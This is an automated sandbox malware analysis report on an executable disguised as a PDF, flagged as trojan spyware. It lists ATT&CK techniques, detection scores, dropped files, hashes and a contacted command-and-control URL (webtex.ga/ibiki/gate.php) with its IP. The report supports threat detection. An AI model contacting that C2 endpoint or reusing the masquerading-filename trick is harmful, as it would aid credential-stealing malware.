              Valid AccountsWindows Management InstrumentationPath InterceptionAccess Token Manipulation1Disable or Modify Tools1OS Credential Dumping2Account Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection12Deobfuscate/Decode Files or Information1Credentials in Registry2File and Directory Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information3Security Account ManagerSystem Information Discovery13SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing12NTDSSecurity Software Discovery111Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol112SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsVirtualization/Sandbox Evasion2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion2Cached Domain CredentialsProcess Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection12Proc FilesystemSystem Owner/User Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              PI_Nov9071011998_ENTRUSTpdf.exe20%VirustotalBrowse
              PI_Nov9071011998_ENTRUSTpdf.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

              Domains

              SourceDetectionScannerLabelLink
              webtex.ga4%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://www.founder.com.cn/cn/90%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/jp/JT0%Avira URL Cloudsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/jp/eT0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/eT0%Avira URL Cloudsafe
              http://www.ibsensoftware.com/0%URL Reputationsafe
              http://www.ibsensoftware.com/0%URL Reputationsafe
              http://www.ibsensoftware.com/0%URL Reputationsafe
              http://www.tiro.com0%URL Reputationsafe
              http://www.tiro.com0%URL Reputationsafe
              http://www.tiro.com0%URL Reputationsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
              http://www.fontbureau.coma0%URL Reputationsafe
              http://www.fontbureau.coma0%URL Reputationsafe
              http://www.fontbureau.coma0%URL Reputationsafe
              http://www.founder.com.cn/cnpro0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/WTa0%Avira URL Cloudsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://fontfabrik.com0%URL Reputationsafe
              http://fontfabrik.com0%URL Reputationsafe
              http://fontfabrik.com0%URL Reputationsafe
              http://www.founder.com.cn/cn0%URL Reputationsafe
              http://www.founder.com.cn/cn0%URL Reputationsafe
              http://www.founder.com.cn/cn0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/s0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/s0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/s0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/Y0/0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/Y0/0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/Y0/0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/$T0%Avira URL Cloudsafe
              http://webtex.ga/ibiki/gate.php0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/Y0-d0%Avira URL Cloudsafe
              http://www.fontbureau.como0%URL Reputationsafe
              http://www.fontbureau.como0%URL Reputationsafe
              http://www.fontbureau.como0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.founder.com.cn/cnac80%Avira URL Cloudsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/3T0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              webtex.ga
              		47.91.79.163
              		truetrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://webtex.ga/ibiki/gate.phptrue
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.apache.org/licenses/LICENSE-2.0PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                		high
                http://www.fontbureau.comPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                  		high
                  http://www.fontbureau.com/designersGPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                    		high
                    http://www.founder.com.cn/cn/9PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.224544561.0000000005F72000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.jiyu-kobo.co.jp/jp/JTPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.fontbureau.com/designers/?PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                      		high
                      http://www.founder.com.cn/cn/bThePI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.jiyu-kobo.co.jp/jp/eTPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225373707.0000000005F68000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.jiyu-kobo.co.jp/eTPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.fontbureau.com/designers?PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                        		high
                        http://www.ibsensoftware.com/PI_Nov9071011998_ENTRUSTpdf.exe, PI_Nov9071011998_ENTRUSTpdf.exe, 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.tiro.comPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designersPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                          		high
                          http://www.goodfont.co.krPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.jiyu-kobo.co.jp/jp/PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.comaPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.234416730.0000000005F67000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.founder.com.cn/cnproPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.224342922.0000000005F71000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.jiyu-kobo.co.jp/WTaPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.carterandcone.comlPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.sajatypeworks.comPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.typography.netDPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers/cabarga.htmlNPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                            		high
                            http://www.founder.com.cn/cn/cThePI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.galapagosdesign.com/staff/dennis.htmPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://fontfabrik.comPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.founder.com.cn/cnPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.224544561.0000000005F72000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers/frere-jones.htmlPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                              		high
                              http://www.jiyu-kobo.co.jp/sPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmp, PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225166450.0000000005F63000.00000004.00000001.sdmp, PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225636033.0000000005F6A000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/Y0/PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/$TPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/Y0-dPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.comoPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.234416730.0000000005F67000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/DPleasePI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers8PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                                		high
                                http://www.founder.com.cn/cnac8PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.224544561.0000000005F72000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fonts.comPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.sandoll.co.krPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.urwpp.deDPleasePI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.zhongyicts.com.cnPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.235301021.0000000002F31000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.sakkal.comPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.jiyu-kobo.co.jp/3TPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    47.91.79.163
                                    		unknownUnited States
                                    		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue

                                    Private

                                    IP
                                    192.168.2.1

                                    General Information

                                    Joe Sandbox Version:31.0.0 Red Diamond
                                    Analysis ID:326333
                                    Start date:03.12.2020
                                    Start time:10:01:23
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 7m 37s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:PI_Nov9071011998_ENTRUSTpdf.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:24
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@3/3@302/2
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 6.8% (good quality ratio 6.5%)
                                    • Quality average: 77.2%
                                    • Quality standard deviation: 28.5%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .exe
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                    • HTTP Packets have been reduced
                                    • TCP Packets have been reduced to 100
                                    • Excluded IPs from analysis (whitelisted): 168.61.161.212, 52.255.188.83, 92.122.144.200, 51.104.139.180, 40.88.32.150, 2.20.142.210, 2.20.142.209, 52.155.217.156, 20.54.26.129, 92.122.213.247, 92.122.213.194
                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    10:02:24API Interceptor312x Sleep call for process: PI_Nov9071011998_ENTRUSTpdf.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    47.91.79.163AD_02207658190080.xlsxGet hashmaliciousBrowse
                                    • webtex.ga/rojas/gate.php
                                    3aMqc1R0cU.exeGet hashmaliciousBrowse
                                    • webtex.ga/rojas/gate.php

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    webtex.gaAD_02207658190080.xlsxGet hashmaliciousBrowse
                                    • 47.91.79.163
                                    3aMqc1R0cU.exeGet hashmaliciousBrowse
                                    • 47.91.79.163

                                    ASN

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCAD_02207658190080.xlsxGet hashmaliciousBrowse
                                    • 47.91.79.163
                                    Shipment Document BL,INV and packing list.jpg.exeGet hashmaliciousBrowse
                                    • 161.117.47.123
                                    UqjZpY9ltr.docGet hashmaliciousBrowse
                                    • 47.244.28.71
                                    UqjZpY9ltr.docGet hashmaliciousBrowse
                                    • 47.244.28.71
                                    UqjZpY9ltr.docGet hashmaliciousBrowse
                                    • 47.244.28.71
                                    3aMqc1R0cU.exeGet hashmaliciousBrowse
                                    • 47.91.79.163
                                    https://bit.ly/2URoZs9Get hashmaliciousBrowse
                                    • 8.208.98.199
                                    http://findwfriends.net.htGet hashmaliciousBrowse
                                    • 8.208.98.199
                                    https://bit.ly/33btgvfGet hashmaliciousBrowse
                                    • 8.208.98.199
                                    https://www.dropbox.com/s/5vgml9mqmjffp3n/Note%207V1N0UE.doc?dl=1Get hashmaliciousBrowse
                                    • 47.244.28.71
                                    B3CcRRb6nV.docGet hashmaliciousBrowse
                                    • 47.244.28.71
                                    http://h5fmt.info/mHNeigecrLGet hashmaliciousBrowse
                                    • 8.210.144.46
                                    Detailed GCIOC2V.docGet hashmaliciousBrowse
                                    • 47.244.28.71
                                    Shipment Document BL,INV And Packing List Attached.exeGet hashmaliciousBrowse
                                    • 47.254.45.60
                                    https://bit.ly/33I4NhtGet hashmaliciousBrowse
                                    • 47.254.170.17
                                    https://bit.ly/3kUgQ0HGet hashmaliciousBrowse
                                    • 8.208.98.199
                                    JFCp0yRoUS1z.vbsGet hashmaliciousBrowse
                                    • 47.241.19.44
                                    http://nity.midlidl.com/indexGet hashmaliciousBrowse
                                    • 8.208.98.199
                                    kj3D6ZRVe22Y.vbsGet hashmaliciousBrowse
                                    • 47.241.19.44
                                    http://yjjv.midlidl.com/indexGet hashmaliciousBrowse
                                    • 8.208.98.199

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PI_Nov9071011998_ENTRUSTpdf.exe.log
                                    Process:C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1301
                                    Entropy (8bit):5.345637324625647
                                    Encrypted:false
                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4VE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz5
                                    MD5:6C42AAF2F2FABAD2BAB70543AE48CEDB
                                    SHA1:8552031F83C078FE1C035191A32BA43261A63DA9
                                    SHA-256:51D07DD061EA9665DA070B95A4AC2AC17E20524E30BF6A0DA8381C2AF29CA967
                                    SHA-512:014E89857B811765EA7AA0B030AB04A2DA1957571608C4512EC7662F6A4DCE8B0409626624DABC96CBFF079E7F0F4A916E6F49C789E00B6E46AD37C36C806DCA
                                    Malicious:true
                                    Reputation:moderate, very likely benign file
                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                    C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                                    Process:C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    File Type:very short file (no magic)
                                    Category:dropped
                                    Size (bytes):1
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3:U:U
                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview: 1
                                    C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                                    Process:C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):55246
                                    Entropy (8bit):0.6022480823964415
                                    Encrypted:false
                                    SSDEEP:3:/lbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbZ:u
                                    MD5:FE84C1E9A3AF7C1FC9D94AA3D80A9DD0
                                    SHA1:9C5E0DC4BF30024D7ED73DF7244D69B101ED157F
                                    SHA-256:72B1E26249BC9E873F2273D5588F3257153747152EA4040FF1C5F143A5BC01B5
                                    SHA-512:B9EA5054C531A185B8CF70959815067BD2504CBA817E5A5B2FD2E122BBE90B6FDDBC84925BE6A91CBBDF7DF474FB78A2EC8DF3C632E67534E0D2FD1BA93B0E2A
                                    Malicious:false
                                    Reputation:low
                                    Preview: ........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user...................................

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):7.678064154183633
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    • DOS Executable Generic (2002/1) 0.01%
                                    File name:PI_Nov9071011998_ENTRUSTpdf.exe
                                    File size:359424
                                    MD5:2349d50a67c2ef85661ef2be6def2cc3
                                    SHA1:b0cfbb76140f37e483fa2ece9c790512e48f29d4
                                    SHA256:9e196418dece3402ea9627106e6e246d5186392f25f8ada694598168481fb0bf
                                    SHA512:1e6262dd441b0fb693099017110783f29dc0a51cbf3caf240d9e31d053c35ce780b1cca43b4aeb3ecf27da5f3ebbe67a6d0c2b2cb2022b2903e7e5d15131b27d
